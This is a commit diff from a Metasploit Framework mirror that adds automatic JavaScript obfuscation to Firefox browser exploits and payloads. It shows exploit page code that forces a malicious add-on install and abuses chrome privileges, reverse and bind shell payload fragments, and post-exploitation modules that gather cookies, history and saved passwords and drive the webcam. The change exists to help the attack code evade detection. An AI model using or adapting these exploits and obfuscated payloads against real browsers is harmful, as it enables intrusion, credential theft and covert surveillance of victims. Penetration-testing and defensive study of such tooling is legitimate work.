github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-16 01:21:15 +02:00
Code Releases Activity

Land #3844 - Add the JSObfu mixin to Firefox exploits

Browse Source
This commit is contained in:
sinn3r 2014-09-29 11:15:14 -05:00
commit 9e5826c4eb
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
21 changed files with 94 additions and 61 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Gemfile.lock
View File

@ -5,7 +5,7 @@ PATH
actionpack (< 4.0.0)
activesupport (>= 3.0.0, < 4.0.0)
bcrypt
jsobfu (~> 0.1.7)
jsobfu (~> 0.2.0)
json
metasploit-concern (~> 0.2.1)
metasploit-model (~> 0.27.1)
@ -91,7 +91,7 @@ GEM
hike (1.2.3)
i18n (0.6.11)
journey (1.0.4)
jsobfu (0.1.7)
jsobfu (0.2.0)
rkelly-remix (= 0.0.6)
json (1.8.1)
mail (2.5.4)

5
lib/msf/core/exploit/android.rb
View File

@ -20,7 +20,7 @@ module Exploit::Android
def add_javascript_interface_exploit_js(arch)
stagename = Rex::Text.rand_text_alpha(5)
script = %Q|
%Q|
function exec(runtime, cmdArr) {
var ch = 0;
var output = '';
@ -84,9 +84,6 @@ module Exploit::Android
for (i in top) { if (attemptExploit(top[i]) === true) break; }
|
# remove comments and empty lines
script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
end

10
lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
View File

@ -7,16 +7,24 @@
#
###
require 'msf/core/exploit/jsobfu'
module Msf
module Exploit::Remote::FirefoxPrivilegeEscalation
# automatically obfuscate anything that runs through `js_exec`
include Msf::Exploit::JSObfu
# Sends the +js+ code to the remote session, which executes it in Firefox's
# privileged javascript context
# privileged javascript context. The code will be obfuscated if the JsObfuscate
# datastore option is set to 1 or higher.
#
# @return [String] the results that were sent back. This can be achieved through
# calling the "send" function, or by just returning the value in +js+
def js_exec(js, timeout=30)
print_status "Running the privileged javascript..."
token = "[[#{Rex::Text.rand_text_alpha(8)}]]"
js = js_obfuscate(js)
session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}")
session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout)
end

9
lib/msf/core/payload/firefox.rb
View File

@ -1,9 +1,13 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/exploit/jsobfu'
require 'json'
module Msf::Payload::Firefox
# automatically obfuscate every Firefox payload
include Msf::Exploit::JSObfu
# Javascript source code of setTimeout(fn, delay)
# @return [String] javascript source code that exposes the setTimeout(fn, delay) method
def set_timeout_source
@ -121,14 +125,15 @@ module Msf::Payload::Firefox
var retVal = null;
try {
retVal = Function('send', js[1])(function(r){
this.send = function(r){
if (sent) return;
sent = true;
if (r) {
if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
else cb(false, r+tag+"\\n");
}
});
};
retVal = Function(js[1]).call(this);
} catch (e) { retVal = e.message; }
sync = false;

2
metasploit-framework.gemspec
View File

@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
spec.add_runtime_dependency 'bcrypt'
# Needed for Javascript obfuscation
spec.add_runtime_dependency 'jsobfu', '~> 0.1.7'
spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
# Needed for some admin modules (scrutinizer_add_user.rb)
spec.add_runtime_dependency 'json'
# Metasploit::Concern hooks

2
modules/exploits/android/browser/webview_addjavascriptinterface.rb
View File

@ -74,6 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote
:os_flavor => 'Android'
}
))
deregister_options('JsObfuscate')
end
# Hooked to prevent BrowserExploitServer from attempting to do JS detection

38
modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
View File

@ -79,21 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
"p2.constructor.defineProperty(obj,key,{get:runme});"
end
%Q|
<html>
<body>
#{datastore['CONTENT']}
<div id='payload' style='display:none'>
if (!window.done) {
window.AddonManager.getInstallForURL(
'#{get_module_uri}/addon.xpi',
function(install) { install.install() },
'application/x-xpinstall'
);
window.done = true;
}
</div>
<script>
script = js_obfuscate %Q|
try{InstallTrigger.install(0)}catch(e){p=e;};
var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
p2.__exposedProps__={
@ -116,6 +102,28 @@ class Metasploit3 < Msf::Exploit::Remote
};
for (var i in window) register(window, i);
for (var i in document) register(document, i);
|
js_payload = js_obfuscate %Q|
if (!window.done) {
window.AddonManager.getInstallForURL(
'#{get_module_uri}/addon.xpi',
function(install) { install.install() },
'application/x-xpinstall'
);
window.done = true;
}
|
%Q|
<html>
<body>
#{datastore['CONTENT']}
<div id='payload' style='display:none'>
#{js_payload}
</div>
<script>
#{script}
</script>
</body>
</html>

40
modules/exploits/multi/browser/firefox_svg_plugin.rb
View File

@ -129,24 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
:loader_path => "#{get_module_uri}.swf",
:content => self.datastore['CONTENT'] || ''
}
%Q|
<!doctype html>
<html>
<head>
<base href="chrome://browser/content/">
</head>
<body>
<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
<symbol id="#{vars[:symbol_id]}">
<foreignObject>
<object></object>
</foreignObject>
</symbol>
<use />
</svg>
<script>
script = js_obfuscate %Q|
var #{vars[:payload_obj_var]} = #{JSON.unparse({vars[:payload_key] => vars[:payload]})};
var #{vars[:payload_var]} = #{vars[:payload_obj_var]}['#{vars[:payload_key]}'];
function $() {
@ -169,6 +152,27 @@ class Metasploit3 < Msf::Exploit::Remote
document.querySelector('use').setAttributeNS(
"http://www.w3.org/1999/xlink", "href", location.href + "##{vars[:symbol_id]}"
);
|
%Q|
<!doctype html>
<html>
<head>
<base href="chrome://browser/content/">
</head>
<body>
<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
<symbol id="#{vars[:symbol_id]}">
<foreignObject>
<object></object>
</foreignObject>
</symbol>
<use />
</svg>
<script>
#{script}
</script>
<iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"

6
modules/exploits/multi/browser/firefox_tostring_console_injection.rb
View File

@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
key = Rex::Text.rand_text_alpha(5 + rand(12))
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
js = Rex::Exploitation::JSObfu.new(%Q|
js = js_obfuscate %Q|
var opts = #{JSON.unparse(opts)};
var key = opts['#{key}'];
var y = {}, q = false;
@ -85,9 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
return 5;
};
console.time(y);
|)
js.obfuscate
|
%Q|
<!doctype html>

7
modules/exploits/multi/browser/firefox_webidl_injection.rb
View File

@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
"{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
"'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
js = Rex::Exploitation::JSObfu.new(%Q|
js = js_obfuscate %Q|
var opts = #{JSON.unparse(opts)};
var key = opts['#{key}'];
@ -127,10 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
setTimeout(function(){top.vvv.close();}, 100);
}, 10);
}
|)
js.obfuscate
|
%Q|
<!doctype html>

1
modules/payloads/singles/firefox/exec.rb
View File

@ -34,6 +34,7 @@ module Metasploit3
<<-EOS
(function(){
window = this;
#{read_file_source if datastore['WSCRIPT']}
#{run_cmd_source if datastore['WSCRIPT']}

1
modules/payloads/singles/firefox/shell_bind_tcp.rb
View File

@ -34,6 +34,7 @@ module Metasploit3
def generate
%Q|
(function(){
window = this;
Components.utils.import("resource://gre/modules/NetUtil.jsm");
var lport = #{datastore["LPORT"]};
var rhost = "#{datastore['RHOST']}";

2
modules/payloads/singles/firefox/shell_reverse_tcp.rb
View File

@ -32,6 +32,8 @@ module Metasploit3
<<-EOS
(function(){
window = this;
Components.utils.import("resource://gre/modules/NetUtil.jsm");
var host = '#{datastore["LHOST"]}';
var port = #{datastore["LPORT"]};

2
modules/post/firefox/gather/cookies.rb
View File

@ -62,7 +62,7 @@ class Metasploit3 < Msf::Post
} catch (e) {
send(e);
}
})(send);
})(this.send);
|.strip
end
end

2
modules/post/firefox/gather/history.rb
View File

@ -80,7 +80,7 @@ class Metasploit3 < Msf::Post
} catch (e) {
send(e);
}
})(send);
})(this.send);
|.strip
end
end

2
modules/post/firefox/gather/passwords.rb
View File

@ -79,7 +79,7 @@ class Metasploit3 < Msf::Post
} catch (e) {
send(e);
}
})(send);
})(this.send);
|.strip
end
end

2
modules/post/firefox/gather/xss.rb
View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Post
};
setTimeout(evt, 200);
})(send);
})(this.send);
|.strip
end

2
modules/post/firefox/manage/webcam_chat.rb
View File

@ -105,7 +105,7 @@ class Metasploit3 < Msf::Post
} catch (e) {
send(e);
}
})(send);
})(this.send);
|
end

3
spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
View File

@ -1,6 +1,5 @@
require 'spec_helper'
require 'msf/core'
require 'msf/core/exploit/remote/browser_exploit_server'
describe Msf::Exploit::Remote::BrowserExploitServer do
@ -58,6 +57,8 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
server.start_service
end
it_should_behave_like 'Msf::Exploit::JSObfu'
describe "#get_module_resource" do
it "should give me a URI to access the exploit page" do
module_resource = server.get_module_resource

8
spec/lib/msf/core/exploit/remote/firefox_privilege_escalation_spec.rb Normal file
View File

@ -0,0 +1,8 @@
require 'spec_helper'
require 'msf/core'
describe Msf::Exploit::Remote::FirefoxPrivilegeEscalation do
it_should_behave_like 'Msf::Exploit::JSObfu'
end

7
spec/lib/msf/core/exploit/jsobfu_spec.rb → spec/support/shared/examples/msf/core/exploit/jsobfu.rb
View File

@ -3,11 +3,11 @@ require 'msf/core'
require 'msf/core/exploit/jsobfu'
describe Msf::Exploit::JSObfu do
shared_examples_for 'Msf::Exploit::JSObfu' do
subject(:jsobfu) do
mod = ::Msf::Module.new
mod.extend described_class
mod.send(:initialize, {})
mod
end
@ -58,4 +58,5 @@ describe Msf::Exploit::JSObfu do
expect(obj.to_s).to include(js)
end
end
end
end